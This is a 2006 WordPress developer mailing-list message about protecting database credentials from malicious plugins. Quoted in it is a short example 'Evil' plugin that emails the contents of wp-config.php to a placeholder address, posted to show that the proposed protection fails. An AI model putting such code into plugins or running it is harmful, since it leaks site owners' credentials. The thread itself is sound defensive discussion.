[wp-hackers] Keeping database connection info safe
Joseph Scott
joseph at randomnetworks.com
Sat Feb 25 01:01:57 GMT 2006
On Feb 24, 2006, at 4:49 PM, Sam Angove wrote:
> On 2/25/06, Joseph Scott <joseph at randomnetworks.com> wrote:
>>
>> It would be very easy to include some malicious code in a plugin that
>> would attempt to email out those details to "bad people". So my
>> first thought was to simply undefine the database connection info
>> once a successful database connection has been established.
>
> <?php
> /*
> Plugin Name: Evil
> */
> wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH .
> 'wp-config.php') );
> ?>
>
> Dave Grijalva wrote:
>> A better way to do this with php5 is to use private member
>> variables and a
>> setter function, but I don't think there is a PHP4 equivalent.
>> Can anybody
>> out there think of a PHP4 compatible way to secure that data?
>
> You could still read in the source file containing the setter, so
> you're right back where you started.
You are absolutely correct. I must admit that I hadn't though about
re-including the wp-config.php file. Well that bites. Is there any
way to really protect against this in either PHP4 or PHP5? I'm
inclined at this point to say no and that everyone better be scanning
their plugins for "evil". Has anyone put together a list of things
that should raise the red flag when they see it in a plugin?
--
Joseph Scott
joseph at randomnetworks.com
http://joseph.randomnetworks.com/
More information about the wp-hackers
mailing list